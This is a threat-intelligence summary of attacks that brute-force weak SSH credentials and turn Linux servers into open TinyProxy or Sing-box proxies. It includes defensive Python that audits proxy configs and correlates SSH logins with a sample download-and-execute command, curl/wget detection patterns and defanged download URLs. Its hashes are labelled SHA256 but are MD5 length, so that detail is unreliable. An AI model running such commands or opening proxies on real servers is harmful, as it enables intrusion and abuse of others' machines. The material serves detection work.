Full Report
AhnLab SEcurity intelligence Center (ASEC) uses honeypots to monitor attacks that target inappropriately managed Linux servers. One representative honeypot is an SSH service with weak credentials, which is targeted by a large number of DDoS and coinminer attackers. ASEC has identified cases where such Linux servers were attacked to install proxies. In […]
Analysis Summary
# Tool/Technique: TinyProxy
## Overview
TinyProxy is a lightweight HTTP/HTTPS proxy daemon designed to be used with lightweight operating systems. In the context of this attack, it is being installed and configured on compromised Linux servers to turn them into open proxy nodes, likely for the attackers to utilize or profit from.
## Technical Details
- Type: Tool (Abused Legitimate Software)
- Platform: Linux (via `apt`, `yum`, or `dnf` installation)
- Capabilities: Acts as an HTTP proxy server; in this case it is configured for unrestricted external access.
- First Seen: N/A (Legitimate tool, abuse context is recent)
## MITRE ATT&CK Mapping
- TA0011 - Command and Control
- T1090 - Proxy
- T1090.001 - Proxy: Multi-hop Proxy (Potential implied use)
## Functionality
### Core Capabilities
- Installed via system package managers (`apt`, `yum`, `dnf`).
- Configuration modification to bypass security controls.
### Advanced Features
- Configuration file modification (`/etc/tinyproxy/tinyproxy.conf` or `/etc/tinyproxy.conf`) to enforce `Allow 0.0.0.0/0`, which permits unrestricted external connections to the proxy port (8888).
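An added example (not code from the report or from the TinyProxy project) that audits a `tinyproxy.conf` for the open-proxy condition described above: it parses the `Port`, `Allow` and `Deny` directives and flags any `Allow` rule that covers every address, or the absence of any access-control rule at all. Both sample configurations are constructed for this example.

```python
import ipaddress

# Constructed sample (not from the report): a tinyproxy.conf after the attacker
# has removed the default Allow lines and inserted Allow 0.0.0.0/0.
OPEN_CONF = """\
Port 8888
Allow 0.0.0.0/0
"""

# Constructed sample of the restrictive form the file should have.
RESTRICTED_CONF = """\
Port 8888
Allow 127.0.0.1
Allow ::1
Allow 10.0.0.0/255.0.0.0
"""

def parse_access_rules(conf_text):
    """Return (port, allow_rules, deny_rules) from tinyproxy.conf text; comments are skipped."""
    port, allows, denies = None, [], []
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key == "port":
            port = int(value)
        elif key == "allow":
            allows.append(value)
        elif key == "deny":
            denies.append(value)
    return port, allows, denies

def audit_tinyproxy_conf(conf_text):
    """List findings that make the proxy reachable by any client on the internet."""
    port, allows, denies = parse_access_rules(conf_text)
    findings = []
    for rule in allows:
        try:
            net = ipaddress.ip_network(rule, strict=False)  # accepts CIDR and netmask forms
        except ValueError:
            continue  # hostname rules are not evaluated here
        if net.prefixlen == 0:  # 0.0.0.0/0 or ::/0 covers every address
            findings.append(f"Allow {rule}: unrestricted access on port {port}")
    if not allows and not denies:  # TinyProxy's default with no ACL keywords is to allow everyone
        findings.append("no Allow/Deny rules present: all clients are allowed")
    return findings
```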
## Indicators of Compromise
- File Hashes: Hashes from the associated malware execution (listed as SHA256): `16d1dfa35d64046128290393512171ce` and `35d79027834a3b6270455f59b54f2e19` (Note: these hashes are listed for the overall attack chain involving the initial Bash malware execution, not for TinyProxy itself).
- File Names: `/etc/tinyproxy/tinyproxy.conf`, `/etc/tinyproxy.conf`
- Registry Keys: N/A
- Network Indicators: Infected system exposes port 8888 for proxy access.
- Behavioral Indicators: Modification or deletion of access control rules (`Allow`/`Deny`) in the TinyProxy configuration file and addition of `Allow 0.0.0.0/0`.
## Associated Threat Actors
- Unspecified threat actors targeting vulnerable/poorly managed Linux servers.
## Detection Methods
- Signature-based detection: Signatures targeting the specific Bash malware used to deploy these tools (IOCs in AhnLab TIP).
- Behavioral detection: Monitoring for package installations of TinyProxy followed immediately by modification of its primary configuration file to globally allow access.
- YARA rules: N/A provided.
## Mitigation Strategies
- Use strong, periodically changed passwords to prevent initial SSH brute-force compromise.
- Apply system patches promptly.
- Implement host-based or network firewalls to restrict source access to servers, especially limiting inbound connections to non-essential ports.
## Related Tools/Techniques
- Sing-box
***
# Tool/Technique: Sing-box
## Overview
Sing-box is an open-source, multipurpose proxy tool capable of supporting protocols like vmess-argo, vless-reality, Hysteria2, and TUICv5. While often intended for legitimate use like bypassing geo-restrictions (e.g., for accessing ChatGPT or Netflix), attackers are installing it on compromised systems to establish unauthorized proxy nodes for illicit activities or profit.
## Technical Details
- Type: Tool (Abused Open-Source Software)
- Platform: Linux
- Capabilities: Serves as a versatile proxy supporting modern tunneling protocols for circumvention.
- First Seen: N/A (Open-source, but recent exploitation observed)
## MITRE ATT&CK Mapping
- TA0011 - Command and Control
- T1090 - Proxy
- T1090.001 - Proxy: Multi-hop Proxy (Potential implied use)
## Functionality
### Core Capabilities
- Installation via a Bash script downloaded from GitHub (`eooce/sing-box/main/sing-box.sh`).
- Establishment of a proxy service usable for external traffic routing.
### Advanced Features
- Support for advanced proxy protocols: vmess-argo, vless-reality, Hysteria2, TUICv5, allowing traffic obfuscation and evasion.
## Indicators of Compromise
- File Hashes: N/A specifically for the Sing-box binary, but the initial payload hashes in the report (see TinyProxy) are relevant to the execution chain.
- File Names: N/A (Tool name itself)
- Registry Keys: N/A
- Network Indicators: The specific URLs used to download the installation scripts:
- `hxxps://raw[.]githubusercontent[.]com/eooce/sing-box/main/sing-box[.]sh`
- Behavioral Indicators: Execution of suspicious Bash scripts retrieved from untrusted GitHub repositories via `curl -Ls` or `bash <(curl -Ls ...)`.
## Associated Threat Actors
- Unspecified threat actors aiming to establish proxy networks, potentially for profit or to conceal subsequent criminal activities.
## Detection Methods
- Signature-based detection: Monitoring for network connections to the GitHub URLs listed above.
- Behavioral detection: Observing the execution of shell commands that download and execute remote scripts using tools like `curl` or `wget` against GitHub source repositories to install proxy utilities.
- YARA rules: N/A provided.
## Mitigation Strategies
- Strict monitoring of external connection attempts (e.g., via proxy software) originating from servers that should only be running specific services.
- Control outbound access from sensitive servers where possible.
- Ensure administrative credentials are secure to prevent the initial remote execution of installation scripts.
## Related Tools/Techniques
- TinyProxy
- Initial execution via the malicious Bash script downloader.
***
# Technique: Installation of Proxy Tools via Initial Compromise
## Overview
Attackers gain initial access, typically via weak SSH credentials (brute-force targeting honeypots), and immediately execute a downloaded Bash script designed to install proxy software (TinyProxy or Sing-box) to convert the compromised Linux server into a proxy node.
## Technical Details
- Type: Technique (Execution and Defense Evasion related to Initial Access)
- Platform: Linux
- Capabilities: Rapid establishment of persistence and C2 channel infrastructure using legitimate or open-source tools.
- First Seen: Ongoing (Reported recently)
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1133 - External Remote Services (Implied: SSH Brute Force)
- TA0002 - Execution
- T1059.004 - Command and Scripting Interpreter: Unix Shell
- TA0005 - Defense Evasion
- T1027 - Obfuscated Files or Information (Use of deployment scripts)
## Functionality
### Core Capabilities
- Initial access achieved via successful SSH login using weak credentials.
- Execution of a downloader Bash script using `wget` or `curl`.
- Use of system package managers (`apt`, `yum`, `dnf`) to install the chosen proxy utility.
- Configuration modification (loosening of access controls) to ensure the proxy tool allows external, unrestricted access.
### Advanced Features
- The initial deployment script leverages specific OS environment checks to choose the correct package manager.
- Persistence is often handled by the configuration changes made to the proxy service (e.g., ensuring the service starts on reboot or remains accessible).
## Indicators of Compromise
- File Hashes:
- Initial downloader script hash (SHA256, likely associated with the payload at `hxxps://0x0[.]st/8VDs.sh`): not reproduced here; consult AhnLab TIP for the precise match, but the delivery URL is the key indicator.
- File Names: `s.sh` (temporary name for the downloaded Bash script).
- Registry Keys: N/A
- Network Indicators:
- Initial C2/Download URL: `hxxps://0x0[.]st/8VDs.sh`
- Sing-box script source: `hxxps://raw[.]githubusercontent[.]com/eooce/sing-box/main/sing-box[.]sh`
- SSH authentication failures preceding successful login attempts.
- Behavioral Indicators: Successful remote login followed immediately by one-line commands downloading and executing remote shell scripts, use of `chmod +x`, and subsequent package installation commands.
## Associated Threat Actors
- Attackers focused on deploying proxy infrastructure, potentially reselling access or using it for further anonymous operations.
## Detection Methods
- Signature-based detection: Signatures for the known external hosting URLs.
- Behavioral detection: Monitoring for SSH logins that immediately spawn shell execution of externally sourced, non-whitelisted scripts (especially those using obfuscated `curl`/`wget` combinations).
- YARA rules: N/A provided.
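An added example (not from the report) of the behavioural detection described here and in the Sing-box section: it correlates sshd login events with the commands run shortly afterwards and raises an alert when a download-and-execute pattern or a proxy-package install follows a login. The log lines, the simplified `cmd[<user>]` record format and the `example.invalid` URL are constructed for this example.

```python
import re
from datetime import datetime, timedelta

# Constructed sample (not from the report): sshd auth lines plus simplified "cmd[<user>]: <cmdline>" process records.
SAMPLE_LOG = """\
2024-05-01T10:00:01 sshd[1201]: Failed password for root from 203.0.113.5 port 50122 ssh2
2024-05-01T10:00:03 sshd[1201]: Failed password for root from 203.0.113.5 port 50122 ssh2
2024-05-01T10:00:05 sshd[1201]: Accepted password for root from 203.0.113.5 port 50122 ssh2
2024-05-01T10:00:09 cmd[root]: wget -q https://example.invalid/s.sh -O s.sh; chmod +x s.sh; ./s.sh
2024-05-01T10:00:40 cmd[root]: apt install -y tinyproxy
2024-05-01T11:30:00 sshd[1340]: Accepted publickey for admin from 198.51.100.7 port 40010 ssh2
2024-05-01T11:31:00 cmd[admin]: apt install -y htop
"""

LINE_RE = re.compile(r"^(\S+) (\w+)\[(\w+)\]: (.*)$")
AUTH_RE = re.compile(r"(Accepted|Failed) \w+ for (\w+) from (\S+) port")
# Download-and-execute and deployment patterns drawn from the indicators above
SUSPICIOUS = [
    (r"bash\s*<\(\s*(curl|wget)", "process-substitution download-and-execute"),
    (r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", "piped download-and-execute"),
    (r"\b(curl|wget)\b.*\bchmod \+x\b", "download followed by chmod +x"),
    (r"\b(apt|apt-get|yum|dnf)\b.*\binstall\b.*\b(tinyproxy|sing-box)\b", "proxy package install"),
]
WINDOW = timedelta(minutes=5)  # how long after a login a command still counts as "immediately after"

def detect_proxy_deployment(log_text):
    """Return alerts for SSH logins followed within WINDOW by suspicious deployment commands."""
    failures, sessions, alerts = {}, {}, []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.fromisoformat(m.group(1))
        prog, tag, msg = m.group(2), m.group(3), m.group(4)
        if prog == "sshd":
            a = AUTH_RE.search(msg)
            if a and a.group(1) == "Failed":
                failures[a.group(3)] = failures.get(a.group(3), 0) + 1
            elif a:  # successful login: open a watch window for this user
                sessions[a.group(2)] = (ts, a.group(3), failures.get(a.group(3), 0))
        elif prog == "cmd" and tag in sessions:
            login_ts, src, prior_failures = sessions[tag]
            if ts - login_ts > WINDOW:
                continue
            for pattern, label in SUSPICIOUS:
                if re.search(pattern, msg):
                    alerts.append({"user": tag, "src": src, "failed_before_login": prior_failures,
                                   "seconds_after_login": int((ts - login_ts).total_seconds()), "reason": label, "cmd": msg})
    return alerts
```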
## Mitigation Strategies
- **Strong Authentication:** Enforce mandatory use of strong, complex passwords for all accounts, especially SSH.
- **Brute-Force Protection:** Deploy fail2ban or similar tools to block repeated failed login attempts.
- **Patch Management:** Ensure the underlying operating system and services (like SSH) are fully patched.
- **Network Segmentation/Firewalls:** Restrict public exposure of sensitive management ports like SSH; if exposure is necessary, limit access based on source IP.
## Related Tools/Techniques
- TinyProxy
- Sing-box
- Automated SSH Login (T1110)